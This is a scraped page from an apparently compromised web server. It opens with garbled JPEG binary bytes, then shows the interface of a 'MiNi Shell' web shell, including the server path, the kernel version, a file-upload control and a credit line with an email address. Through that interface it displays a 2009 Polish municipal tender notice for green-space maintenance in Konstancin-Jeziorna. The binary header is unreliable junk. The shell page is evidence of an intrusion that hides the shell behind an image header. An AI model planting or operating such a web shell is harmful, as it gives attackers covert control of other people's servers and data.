JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090410/101796-N-2009.html

<p class="kh_header"><b>Konstancin-Jeziorna: Utrzymanie obiektów zieleni urządzonej 
oraz inne prace ogrodnicze na terenie miasta Konstancin-Jeziorna</b><br>
<b>Numer ogłoszenia: 101796 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Konstancin-Jeziorna , ul. Warszawska 32, 05-520 Konstancin-Jeziorna, woj. mazowieckie, tel. 022 756 48 10, 717-53-85, faks 022 756 48 85, 7564608.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.konstancinjeziorna.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.konstancinjeziorna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie obiektów zieleni urządzonej 
oraz inne prace ogrodnicze na terenie miasta Konstancin-Jeziorna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia:
1) Przedmiotem zamówienia jest realizacja usług polegających na kompleksowej pielęgnacji i utrzymaniu w czystości urządzonych terenów zieleni (obiektów objętych zadaniem nr 1) oraz świadczenie usług (w zakresie określonym w zadaniu nr 2) względem bieżących potrzeb ogrodniczych na terenie miasta Konstancin-Jeziorna.
Zakres działań obejmuje:
Zadanie 1): Kompleksowe utrzymanie terenów zieleni urządzonej:
a)	Park osiedlowy w Mirkowie,
b)	Skwer (przy oczku wodnym),
c)	Zieleńce przyuliczne w rejonie ul. Świetlicowej/Polnej,
d)	Zieleń osiedla Mirków,
e)	Zieleń osiedla Porąbka,
f)	Teren zieleni nad stawem w Mirkowie (termin rozpoczęcia usługi - 04.06.2009r.).
Przez kompleksowe utrzymanie terenów zieleni urządzonej należy rozumieć bieżące wykonywanie wszystkich niezbędnych prac (ogrodniczych i porządkowych) zapewniających osiągnięcie właściwego efektu estetycznego na poszczególnych obiektach.
Rozliczenie usług w tym zakresie nastąpi w 6 równych częściach na podstawie bezusterkowego protokołu odbioru prac względem poszczególnych obiektów. 

Zadanie 2): Inne prace w zakresie utrzymania i kształtowania zieleni w mieście:
a)	Obsadzenia i pielęgnacja donic, kwietników i wież kwiatowych,
b)	Obsadzenia i pielęgnacja rabat kwiatowych, z wykonaniem obrzeży,
c)	Cięcia pielęgnacyjne krzewów oraz żywopłotów rosnących w obszarze miasta,
d)	Odchwaszczanie i korowanie powierzchni zakrzewionych,
e)	Renowacja trawników.
Zamówienie w tym zadaniu będzie realizowane na podstawie sukcesywnie przeprowadzanych oględzin w terenie z udziałem Wykonawcy, względem bieżących potrzeb. Zakres prac, lokalizacja i termin realizacji poszczególnych czynności będzie każdorazowo określany protokołem wprowadzenia. Rozliczenie prac nastąpi na podstawie protokołu odbioru robót stwierdzającego wykonanie poszczególnych czynności w odniesieniu do ilości i jakości

2) Szczegółowy wykaz wszystkich prac stanowi załącznik nr 1 do SIWZ.

Powyższy załącznik stanowi integralną część SIWZ.

2. Inne informacje dotyczące przedmiotu zamówienia.
1)	Wykonawca realizując prace określone w zadaniu nr 1), jest zobowiązany każdorazowo powiadomić inspektora nadzorującego prace o terminie i miejscu rozpoczęcia prac oraz o ewentualnych problemach w trakcie ich realizacji.
2)	Podstawą do wystawienia faktur i dokonania płatności za wykonane prace będą protokoły odbioru - bez zastrzeżeń, zarówno dla zadania nr 1 jak i zadania nr 2.
3)	Realizacja prac powinna być zorganizowana i wykonywana w sposób gwarantujący pełną ochronę istniejącego drzewostanu (część terenu leży w strefie objętej ochroną konserwatorską).
4)	Zaleca się Wykonawcom zapoznanie się ze specyfiką terenu i warunkami lokalnymi, w których będzie realizowany przedmiot zamówienia.
5)	Zamawiający oczekuje od Wykonawców odpowiedniego przygotowania kadrowego i technicznego, które pozwoli na terminowe i efektywne wykonanie prac objętych zamówieniem oraz prowadzenia ich w jednym czasie na różnych terenach określonych zamówieniem.
6)	Do obowiązków Wykonawcy będzie należało m.in. przygotowanie (ewentualne zabezpieczenie) terenu do realizacji prac (np w miarę potrzeb - rozmieszczenie informacji o planowanych robotach), usunięcie przeszkód utrudniających wykonanie prac.
7)	W ramach świadczenia usług, w przypadku konieczności poruszania się po drogach powiatowych i gminnych objętych ograniczeniem dopuszczalnej masy całkowitej pojazdami przekraczającymi to ograniczenie (do 2,5 t), niezbędne będzie uzyskanie zgody Starostwa Powiatowego w Piasecznie przez Wykonawcę. Poruszanie się po nawierzchniach nieutwardzonych (trawiastych) jest możliwe wyłącznie mniejszymi pojazdami o masie całkowitej nieprzekraczającej 2,5 t.
8)	W celu zapewnienia ochrony obiektów zieleni oraz bezpieczeństwa ich użytkownikom, ruch pojazdów mechanicznych po terenie winien być ograniczony do niezbędnego minimum.
9)	Bezwzględnie zabrania się poruszania pojazdami, których wielkość (lub ciężar) w jakikolwiek sposób może spowodować uszkodzenie drzewostanu w tym ich systemu korzeniowego.
10)	Zamawiający zastrzega sobie prawo do zmiany obsługiwanej powierzchni terenu jak również ilości lub krotności prac - w tym, zmniejszenia maksymalnie o 20% ogólnej wartości przedmiotu zamówienia, podyktowanych nieprzewidzianymi okolicznościami oraz bieżącymi potrzebami (np. realizacja robót drogowych, budowlanych)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.34.20.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Przystępując do postępowania w trybie przetargu nieograniczonego, każdy Wykonawca składa oświadczenie, że:
1). posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2). posiada niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a) wykażą, że wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich 3 lat (przed dniem wszczęcia postępowania o udzielenie zamówienia), a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonali co najmniej 1 usługę o wartości nie mniejszej niż 100.000 zł. brutto, odpowiadającą swoim rodzajem zadaniu będącym przedmiotem zamówienia, a w szczególności polegającym na pielęgnacji i utrzymaniu w czystości założeń parkowych.
b) wykażą, że dysponują lub będą dysponowali kierownikiem prac ogrodniczych, posiadającym odpowiednie kwalifikacje i przygotowanie tj. wykształcenie ogrodnicze lub pochodne lub uprawnienia Inspektora Nadzoru Terenów Zieleni i co najmniej 12 miesięczną praktykę zawodową przy urządzaniu i utrzymywaniu terenów zieleni,
3). znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (w oparciu o art. 22 ust.1 ustawy pzp), tj.:
a) posiadają polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50.000,00 zł 
4). nie podlega wykluczeniu z postępowania o udzielenie zamówienia (na podstawie art. 24 ust. 1 i 2 ustawy pzp).

2. Sposób dokonywania oceny spełniania warunków
1)	Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na podstawie treści złożonych oświadczeń i dokumentów wymaganych zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2006r. Nr 87, poz. 605), wskazanych w Rozdziale VII. SIWZ.
2)	Przy dokonywaniu oceny spełniania warunków Zamawiający będzie się kierował regułą (spełnia - nie spełnia).
3)	Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił.
4)	Zamawiający zgodnie z art. 26 ust 3 ustawy pzp, wzywa wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń i dokumentów, o których mowa w art. 25 ust.1 ustawy pzp, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa - do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.
5)	Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na potwierdzenie spełnienia warunków, o których mowa w Rozdziale VI SIWZ Wykonawca musi dołączyć do oferty następujące dokumenty oraz oświadczenia (w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę):
1)	wypełniony formularz ofertowy stanowiący załącznik nr 2,
2)	wypełniony formularz cenowy, stanowiący załącznik nr 2.1 do formularza ofertowego,
3)	oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy oraz że nie podlega wykluczeniu z powodów wymienionych w art. 24 ust. 1 i 2 ustawy pzp -załącznik nr 3,
4)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5)	wykażą, że dysponują lub będą dysponowali osobą, która będzie uczestniczyć w wykonaniu zamówienia, wraz z informacją na temat jej kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia. Zamawiający żąda wykazania się dysponowaniem kierownikiem prac ogrodniczych, posiadającym wykształcenie ogrodnicze lub pochodne lub uprawnienia Inspektora Nadzoru Terenów Zieleni i co najmniej 12 miesięczną praktykę zawodową przy urządzaniu terenów zieleni, wraz z dokumentami potwierdzającymi właściwe kwalifikacje i przygotowanie -załącznik nr 4,
6)	wykaz wykonanych lub wykonywanych usług, o których mowa w rozdziale VI, ust. 2 niniejszej SIWZ - załącznik nr 5 wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie (np opinie, referencje) 
7)	polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 50.000 zł 

2. 	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt 4) składa dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.

3.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takich dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.konstancinjeziorna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Urzędu Miasta i Gminy Konstancin - Jeziorna, ul. Warszawska 29
Wydział Rolnictwa i Ochrony Środowiska.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy Konstancin-Jeziorna, 05-520 Konstancin - Jeziorna,  ul. Świetlicowa 1  (sala konferencyjna).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com